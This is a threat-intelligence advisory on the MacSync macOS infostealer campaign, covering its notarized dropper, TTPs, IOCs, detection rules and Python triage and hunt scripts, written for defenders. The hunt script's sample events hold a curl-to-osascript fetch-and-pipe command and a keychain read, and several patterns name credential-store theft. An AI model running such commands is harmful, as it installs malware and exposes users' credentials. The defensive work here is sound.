MacSync Stealer Campaign

BLUF

A newly uncovered variant of the MacSync macOS infostealer avoids Apple's Gatekeeper warnings by shipping as a code-signed and notarized Swift application, so the user sees no "unidentified developer" prompt when opening the installer.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations impacted by the MacSync macOS infostealer campaign or suspected abuse of notarized applications:

  • Low-end total cost: $750,000 – $1.1M
    (Rapid containment, limited credential reuse, minimal regulatory exposure)

  • Typical expected range: $1.4M – $2.2M

  • Upper-bound realistic scenarios: $2.8M – $4M
    (Widespread credential compromise, third-party access concerns, regulatory follow-on)

Key cost driver:

This activity is financially dangerous not because it causes immediate outages, but because it undermines trust in notarized software and endpoint identity. Costs are driven by credential assurance, access revalidation, and governance response once macOS trust controls are shown to be bypassed.

Targeted Sectors

·         High-value individuals

·         Enterprises

·         Cryptocurrency users

Countries

·         Global

Date of First Reported Activity

·         December 2025

Date of Last Activity Update

·         December 23, 2025

APT Names

·         BlueNoroff (Lazarus Group)

Cyber Criminal organizations names

·          Russian-speaking cybercriminals

IOCs

·         This is a malware-as-a-service campaign, so file hashes and infrastructure vary between operators and waves.

·         As a reminder, IOCs tend to be dynamic. Hunting for the heuristic activity described under TTPs is likely to give more accurate results than matching the static indicators below.

Network Indicators

(C2 and Distribution)

Attackers use fake installer domains and remote servers to host encoded second-stage scripts.

Distribution Domain

·         zkcall[.]net (often serving a fake "zk-Call" messenger installer).

Download URL

·         hxxps://zkcall[.]net/download (no trailing path component; the installer DMG is served from this path)

Infrastructure Pattern

·         Exfiltration and beaconing come from the dropped helper executables (the Swift dropper's helpers and the Go-based agent) rather than from a browser or curl, so C2 detection should pivot on which process opened the connection, not on user-agent strings alone.

Host-Based Indicators

Malicious Filename

zk-call-messenger-installer-3.9.2-lts.dmg

Apple Developer Team ID

GNJLS3UYZ4 (Note: This certificate was revoked in late December 2025 after reports to Apple).

Disk Image Characteristics

DMGs inflated to roughly 25.5 MB with decoy files such as LibreOffice PDFs, far more than the small Swift dropper needs, so that simple automated scanners with a size ceiling skip or truncate the image. The decoy share is a useful triage heuristic: a small .app next to megabytes of unrelated documents.
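The two host indicators above, the signing Team ID and the padded image, can be checked offline with a short script. The following is an added example, not CyberDax's tooling and not code from the MacSync reporting: the codesign and spctl transcripts, the com.example.zkcall bundle identifier, the developer name and the temporary volume layout are constructed stand-ins, and only the Team ID is taken from this page.

```python
"""Offline triage for a suspect notarized installer (added example, not CyberDax code).
(1) Pull Team ID, Developer ID chain and notarization state out of codesign/spctl output
and compare against the revoked Team ID; (2) measure how much of a mounted DMG is decoy
content sitting outside the .app bundle. All sample data below is constructed."""
import os
import re
import subprocess
import tempfile
from pathlib import Path

KNOWN_BAD_TEAM_IDS = {"GNJLS3UYZ4"}  # Team ID from the advisory, revoked late Dec 2025

# Constructed: shape of `codesign -dv --verbose=4 App.app` (printed on stderr).
SAMPLE_CODESIGN = """\
Executable=/Volumes/zk-Call/zk-Call.app/Contents/MacOS/zk-Call
Identifier=com.example.zkcall
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Authority=Developer ID Application: Example Dev (GNJLS3UYZ4)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=Dec 19, 2025 at 10:00:00 AM
TeamIdentifier=GNJLS3UYZ4
Runtime Version=14.0.0
"""
# Constructed: shape of `spctl -a -vv -t execute App.app`.
SAMPLE_SPCTL = """\
/Volumes/zk-Call/zk-Call.app: accepted
source=Notarized Developer ID
origin=Developer ID Application: Example Dev (GNJLS3UYZ4)
"""

_KV = re.compile(r"^([^=]+)=(.*)$")


def parse_codesign(text):
    """key=value lines into a dict; Authority repeats once per cert, so keep a list."""
    info = {"Authority": []}
    for line in text.splitlines():
        m = _KV.match(line.strip())
        if not m:
            continue
        key, value = m.groups()
        if key == "Authority":
            info["Authority"].append(value)
        else:
            info[key] = value
    return info


def assess_signature(codesign_text, spctl_text):
    """Signer facts a responder wants, plus the block-list verdict on the Team ID."""
    info = parse_codesign(codesign_text)
    team = info.get("TeamIdentifier", "")
    return {
        "team_id": team,
        "developer_id": any("Developer ID Certification Authority" in a
                            for a in info["Authority"]),
        "notarized": "source=Notarized Developer ID" in spctl_text,
        "gatekeeper_accepts": re.search(r":\s*accepted\b", spctl_text) is not None,
        "known_bad_team": team in KNOWN_BAD_TEAM_IDS,
    }


def triage_app_on_macos(app_path):
    """Run the real tools (macOS only); codesign reports on stderr, spctl on both."""
    cs = subprocess.run(["codesign", "-dv", "--verbose=4", app_path],
                        capture_output=True, text=True)
    sp = subprocess.run(["spctl", "-a", "-vv", "-t", "execute", app_path],
                        capture_output=True, text=True)
    return assess_signature(cs.stderr, sp.stdout + sp.stderr)


def decoy_ratio(volume):
    """Bytes inside any *.app bundle vs. bytes elsewhere on the volume."""
    volume = Path(volume)
    app_bytes = other_bytes = 0
    decoys = []
    for root, _dirs, files in os.walk(volume):
        rel = Path(root).relative_to(volume)
        in_app = any(part.endswith(".app") for part in rel.parts)
        for name in files:
            size = (Path(root) / name).lstat().st_size
            if in_app:
                app_bytes += size
            else:
                other_bytes += size
                decoys.append((str(rel / name), size))
    total = app_bytes + other_bytes
    return {"app_bytes": app_bytes, "decoy_bytes": other_bytes,
            "decoy_share": other_bytes / total if total else 0.0,
            "decoys": sorted(decoys, key=lambda d: -d[1])}


def build_sample_volume():
    """Constructed stand-in for a mounted installer: tiny app, 2 MB decoy PDF."""
    vol = Path(tempfile.mkdtemp(prefix="zk-call-vol-"))
    macos_dir = vol / "zk-Call.app" / "Contents" / "MacOS"
    macos_dir.mkdir(parents=True)
    (macos_dir / "zk-Call").write_bytes(b"\xcf\xfa\xed\xfe" + b"\0" * 4096)
    (vol / "Getting Started.pdf").write_bytes(b"%PDF-1.4\n" + b"x" * (2 * 1024 * 1024))
    (vol / ".background").mkdir()
    (vol / ".background" / "bg.png").write_bytes(b"\x89PNG" + b"\0" * 512)
    return vol


if __name__ == "__main__":
    print(assess_signature(SAMPLE_CODESIGN, SAMPLE_SPCTL))
    stats = decoy_ratio(build_sample_volume())
    print(f"decoy share {stats['decoy_share']:.3f}, biggest decoy {stats['decoys'][0]}")
```

On a real host, mount the image with hdiutil attach -nobrowse -readonly, point triage_app_on_macos at the .app and decoy_ratio at the mount point; a notarized Developer ID signature with a Team ID on the block list, next to a decoy share above 0.9, is exactly the combination this campaign produces.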

Execution Patterns and Behavior

Dropper Method

A notarized Swift application that silently retrieves an encoded script from a remote server.

Persistence/Backdoor

Features a Go-based agent that provides persistent backdoor access in addition to data exfiltration.

Environmental Checks

The malware checks for active internet connectivity and limits execution frequency to remain stealthy.

Memory Execution

Many MacSync payloads run primarily in memory, leaving minimal traces on the physical disk after the initial dropper execution.

TTPs

Initial Access

·         T1189 – Drive-by Compromise: Using malvertising and fake software landing pages to trick users into downloading malicious disk images.

·         T1566.002 – Phishing: Spearphishing Link: Directing high-value targets (often in the crypto or enterprise sectors) to "ordinary-looking" utility URLs.

·         T1204.002 – User Execution: Malicious File: Luring victims to open a .dmg file masquerading as a legitimate tool, such as a "zk-Call" messenger.

Execution

·         T1059.002 – Command and Scripting Interpreter: AppleScript: Used for initial dropper functions and to prompt users for sensitive information.

·         T1204.004 – User Execution: Malicious Copy and Paste: earlier versions relied on "ClickFix" or "drag-to-terminal" routines, where the victim pastes or drags a command into Terminal. No vulnerability is exploited, so T1203 (Exploitation for Client Execution) does not apply; the bypass is the user running the command.

·         T1106 – Native API: The 2025 version uses a Swift-based application that interacts directly with system APIs to fetch payloads silently.

Persistence

·         T1543.001 – Create or Modify System Process: Launch Agent: Establishing persistence by creating .plist files (e.g., com.finder.helper.plist) to ensure the malware runs upon login.

·         T1105 – Ingress Tool Transfer: the dropper fetches a Go-based agent that then acts as a modular backdoor for persistent remote command and control. T1105 is a Command and Control technique; it is listed here because the agent, once written to disk and registered through the Launch Agent above, is what survives a reboot.

Defense Evasion

·         T1553.002 – Subvert Trust Controls: Code Signing: Using legitimate Apple Developer certificates to sign and notarize the Swift app, allowing it to bypass macOS Gatekeeper without warnings.

·         T1027.001 – Obfuscated Files or Information: Binary Padding: inflating the disk image with large decoy files (e.g. LibreOffice PDFs) so it exceeds the size ceiling of automated sandbox scanners that skip or truncate large submissions.

·         T1497.001 – Virtualization/Sandbox Evasion: System Checks: Checking for active internet connectivity and limiting execution frequency to evade detection by security researchers.

Credential Access

·         T1555.001 – Credentials from Password Stores: Keychain: Specifically targeting the macOS Keychain to extract saved passwords and certificates.

·         T1539 – Steal Web Session Cookie: Harvesting cookies and login data from browsers to bypass multi-factor authentication (MFA).

Command and Control (C2)

·         T1071.001 – Application Layer Protocol: Web Protocols: HTTPS communication through Go's native net/http library rather than curl, so rules that hunt for curl command lines or curl's User-Agent do not see it. Unless the agent overrides it, net/http identifies itself as "Go-http-client/1.1" (or "Go-http-client/2.0" over HTTP/2), which is rare from a user's Mac and worth a proxy or TLS-inspection query.

·         T1568 – Dynamic Resolution: employing rotating infrastructure and URLs as redirectors, making it harder to block via static IP or domain blocklists.

Malware Names

·         MacSync Stealer

Sample data information

Installer (DMG)

sha256

b591bfbab57cc69ce985fbc426002ef00826605257de0547f20ebcfecc3724c2

(Filename: zk-call-messenger-installer-3.9.2-lts.dmg)

URL link to sample

·         hxxps://www.virustotal.com/gui/file/b591bfbab57cc69ce985fbc426002ef00826605257de0547f20ebcfecc3724c2

Installer (DMG)

sha256

be961ec5b9f4cc501ed5d5b8974b730dabcdf7e279ed4a8c037c67b5b935d51a

(Filename: zk-call-messenger-installer-3.9.2-lts.dmg)

URL link to sample

·         hxxps://www.virustotal.com/gui/file/be961ec5b9f4cc501ed5d5b8974b730dabcdf7e279ed4a8c037c67b5b935d51a

Malicious Binary (Mach-O)

sha256

173ff5ede7c28163ceaa9440de8a02cef26295f8be06b6b0f90b0a4284471bc2

(Filename: devupdatesuite-helper)

URL link to sample

·         hxxps://www.virustotal.com/gui/file/173ff5ede7c28163ceaa9440de8a02cef26295f8be06b6b0f90b0a4284471bc2

Helper Component (Mach-O)

sha256

ecfaa20f25e11878686249c7094706bc3dcd2dc0ace0f2932a39d1bfdac85863

(Filename: runtimectl)

URL link to sample

·         hxxps://www.virustotal.com/gui/file/ecfaa20f25e11878686249c7094706bc3dcd2dc0ace0f2932a39d1bfdac85863

CVEs & CVSS

·         Bypasses security features without a specific CVE; exploits user trust in notarized apps.

Suggested rules and potential hunts

Suricata

Network Detection

Rule for the fake installer download (scoped to the distribution domain reported above):

# Matching only on a User-Agent containing "Mac OS X 10_15_7" is not usable on its own:
# Safari and Chrome freeze the macOS version in their User-Agent at 10_15_7, so that
# content fires on ordinary browsing from every Mac. Key on the reported host instead.
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"MALWARE MacSync Stealer - Fake zk-Call installer download"; flow:established,to_server; http.method; content:"GET"; http.host; content:"zkcall.net"; endswith; http.uri; content:"/download"; startswith; classtype:trojan-activity; sid:1000002; rev:2;)

Rule for exfiltration by the Go agent:

# POST plus application/octet-stream alone matches any binary upload. The User-Agent
# clause narrows it to Go's net/http default ("Go-http-client/1.1", or "Go-http-client/2.0"
# over HTTP/2), which assumes the agent does not set its own User-Agent; the reporting
# does not say either way. Treat hits as a hunt lead, not a block decision.
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"MALWARE MacSync Stealer - Possible Go agent exfiltration (POST octet-stream, Go default User-Agent)"; flow:established,to_server; http.method; content:"POST"; http.content_type; content:"application/octet-stream"; http.user_agent; content:"Go-http-client/"; startswith; classtype:trojan-activity; sid:1000003; rev:2;)

Both rules use the 1000000-1999999 range conventionally reserved for local rules; the original 2025002/2025003 values sit inside the Emerging Threats allocation and would collide with that ruleset.


SentinelOne

Endpoint Hunting

Field names in these hunts are illustrative; map them to the tenant's schema (in Deep Visibility the process and file fields are SrcProcName, SrcProcCmdLine and TgtFilePath, with the signer fields alongside them).

Hunt for Signed Dropper Execution

ProcessName = "zk-Call" OR DeveloperID = "GNJLS3UYZ4"

(Note: Apple revoked the certificate in late December 2025. Do not exclude revoked signatures as the original hunt did; the point of the query is to surface historical executions from before revocation, and the Team ID is the most stable pivot for that.)

Hunt for Fetch-and-Pipe into AppleScript or a Shell

ObjectType = "Process" AND (CmdLine CONTAINS "curl" OR CmdLine CONTAINS "wget") AND (CmdLine CONTAINS "| osascript" OR CmdLine CONTAINS "| sh" OR CmdLine CONTAINS "| bash")

(Pipe spacing varies; prefer a regex match where the platform offers one.)

Hunt for Sensitive Data Access

ObjectType = "File" AND (FilePath CONTAINS "Library/Keychains" OR FilePath CONTAINS "Cookies.binarycookies") AND ProcessName NOT IN ("securityd", "secd", "Safari", "Keychain Access")

(The original hunt only matched cat; the stealer can just as well use cp, osascript or security, so exclude the processes that legitimately touch these files and review everything else.)

Splunk

Detect "Fetch-and-Pipe" Activity

index=macos sourcetype="osquery:results" name="process_events" (cmdline="*curl*|*osascript*" OR cmdline="*curl*|*sh*" OR cmdline="*curl*|*bash*") | table _time, host, user, cmdline

Identify Inflated DMG Installations

osquery has no disk_images table. Schedule a query against the file table instead (for example SELECT path, filename, size, mtime FROM file WHERE path LIKE '/Users/%/Downloads/%.dmg';) under a name such as downloaded_dmgs and hunt on its results:

index=macos sourcetype="osquery:results" name="downloaded_dmgs" | where size > 25000000 AND filename LIKE "%.dmg" | table _time, host, path, size

(Hunts for installers of 25 MB and up. The decoy PDFs sit inside the image, so confirming the inflation means mounting it with hdiutil attach -nobrowse -readonly and listing the volume; a directory listing alone cannot see them.)

Monitor for Unauthorized Keychain Collection

syslog does not carry process command lines, so this hunt has to run over process telemetry:

index=macos sourcetype="osquery:results" name="process_events" (cmdline="*login.keychain*" OR cmdline="*Cookies.binarycookies*" OR cmdline="*/Library/Cookies/*") | stats count by host, user, path, cmdline
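The SentinelOne and Splunk hunts above, and the Persistence and Credential Access TTPs they cover, are easier to tune when the logic first runs over sample events. The following is an added example, not CyberDax's queries and not a vendor product: it uses a constructed, normalised event schema (type, host, process, process_path, cmdline, path) that the reader maps from their own telemetry, and the host names, user and command lines in SAMPLE_EVENTS are made up, with only the download URL and the com.finder.helper.plist name taken from this page.

```python
"""Endpoint hunt prototypes for the MacSync TTPs (added example, not CyberDax's queries).
Events are dicts in a constructed, normalised schema; mapping osquery process_events
or SentinelOne Deep Visibility fields onto it is left to the reader."""
import re

# Downloader piped into an interpreter, optionally through base64 -d: the
# "fetch-and-pipe" pattern behind the curl | osascript hunt.
FETCH_AND_PIPE = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:base64\s+-[dD]\w*\s*\|\s*)?(?:sudo\s+)?"
    r"(osascript|bash|sh|zsh|python3?)\b")

# Credential stores named under Credential Access: login keychain, Safari
# cookies, Chromium cookie and login databases.
SENSITIVE_PATHS = [re.compile(p) for p in (
    r"/Library/Keychains/",
    r"/Library/Cookies/Cookies\.binarycookies$",
    r"/Library/Application Support/Google/Chrome/.*/(Cookies|Login Data)$",
)]
# Processes expected to touch those files; a starting baseline to tune per fleet.
STORE_BASELINE = {"securityd", "secd", "Safari", "Keychain Access", "Google Chrome"}

# Launch Agent plist written by something running from a mounted image,
# a temp dir or Downloads, or by a script host: the T1543.001 pattern.
LAUNCH_AGENT_PLIST = re.compile(r"/Library/LaunchAgents/[^/]+\.plist$")
UNTRUSTED_ORIGIN = re.compile(r"^(/Volumes/|/tmp/|/private/tmp/|/Users/[^/]+/Downloads/)")
SCRIPT_HOSTS = {"osascript", "sh", "bash", "zsh"}


def hunt(events):
    """Return (rule_name, event) pairs in input order."""
    findings = []
    for ev in events:
        if ev["type"] == "process" and FETCH_AND_PIPE.search(ev.get("cmdline", "")):
            findings.append(("fetch_and_pipe", ev))
        elif ev["type"] == "file":
            path = ev.get("path", "")
            if (any(rx.search(path) for rx in SENSITIVE_PATHS)
                    and ev["process"] not in STORE_BASELINE):
                findings.append(("credential_store_access", ev))
            if LAUNCH_AGENT_PLIST.search(path) and (
                    UNTRUSTED_ORIGIN.match(ev.get("process_path", ""))
                    or ev["process"] in SCRIPT_HOSTS):
                findings.append(("launch_agent_from_untrusted_origin", ev))
    return findings


SAMPLE_EVENTS = [  # constructed; hosts, user and command lines are made up
    {"type": "process", "host": "mbp-01", "process": "sh", "process_path": "/bin/sh",
     "cmdline": "sh -c 'curl -fsSL https://zkcall[.]net/download | osascript'", "path": ""},
    {"type": "file", "host": "mbp-01", "process": "cat", "process_path": "/bin/cat",
     "cmdline": "cat /Users/alice/Library/Keychains/login.keychain-db",
     "path": "/Users/alice/Library/Keychains/login.keychain-db"},
    {"type": "file", "host": "mbp-01", "process": "Safari",
     "process_path": "/Applications/Safari.app/Contents/MacOS/Safari", "cmdline": "",
     "path": "/Users/alice/Library/Cookies/Cookies.binarycookies"},
    {"type": "file", "host": "mbp-01", "process": "zk-Call",
     "process_path": "/Volumes/zk-Call/zk-Call.app/Contents/MacOS/zk-Call", "cmdline": "",
     "path": "/Users/alice/Library/LaunchAgents/com.finder.helper.plist"},
    {"type": "process", "host": "mbp-02", "process": "sh", "process_path": "/bin/sh",
     "cmdline": "sh -c 'curl -s https://example.org/notes.txt | grep TODO'", "path": ""},
    {"type": "process", "host": "mbp-02", "process": "curl", "process_path": "/usr/bin/curl",
     "cmdline": "curl -sI https://example.org/", "path": ""},
]


if __name__ == "__main__":
    for rule, ev in hunt(SAMPLE_EVENTS):
        print(f"{rule:36} {ev['host']:8} {ev['process']:10} {ev.get('cmdline') or ev['path']}")
```

Run directly it prints three hits: the curl | osascript dropper command, cat reading login.keychain-db, and the zk-Call binary on a mounted volume writing com.finder.helper.plist. Safari reading its own cookie store and the two benign curl invocations (a pipe into grep and a bare HEAD request) stay silent, which is the false-positive boundary the page's curl | osascript query has to draw.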

Delivery Method

Malicious disk images (DMG) containing decoy content and a legitimate-looking notarized app.

References

CSO Online

·         hxxps://www.csoonline.com/article/4111179/macsync-stealer-malware-bypasses-macos-gatekeeper-security-warnings.html

SC Media

·         hxxps://www.scworld.com/brief/updated-delivery-method-employed-by-macsync-malware

Jamf

·         hxxps://www.jamf.com/blog/macsync-stealer-evolution-code-signed-swift-malware-analysis

AppleInsider

·         hxxps://appleinsider.com/articles/25/12/23/malware-bypassed-macos-gatekeeper-by-abusing-apples-notarization-proccess

Infosecurity Magazine

·         hxxps://www.infosecurity-magazine.com/news/signed-variant-macsync-stealer

Reddit

·         hxxps://www.reddit.com/r/apple/comments/1ptr7uo/new_macsync_malware_dropper_evades_macos

The Hacker News

·         hxxps://thehackernews.com/2025/12/new-macsync-macos-stealer-uses-signed.html

Malware Traffic Analysis

·         hxxps://www.malware-traffic-analysis.net/2025/12/23/index.html

VirusTotal

·         hxxps://www.virustotal.com/gui/file/b591bfbab57cc69ce985fbc426002ef00826605257de0547f20ebcfecc3724c2

·         hxxps://www.virustotal.com/gui/file/173ff5ede7c28163ceaa9440de8a02cef26295f8be06b6b0f90b0a4284471bc2

·         hxxps://www.virustotal.com/gui/file/ecfaa20f25e11878686249c7094706bc3dcd2dc0ace0f2932a39d1bfdac85863
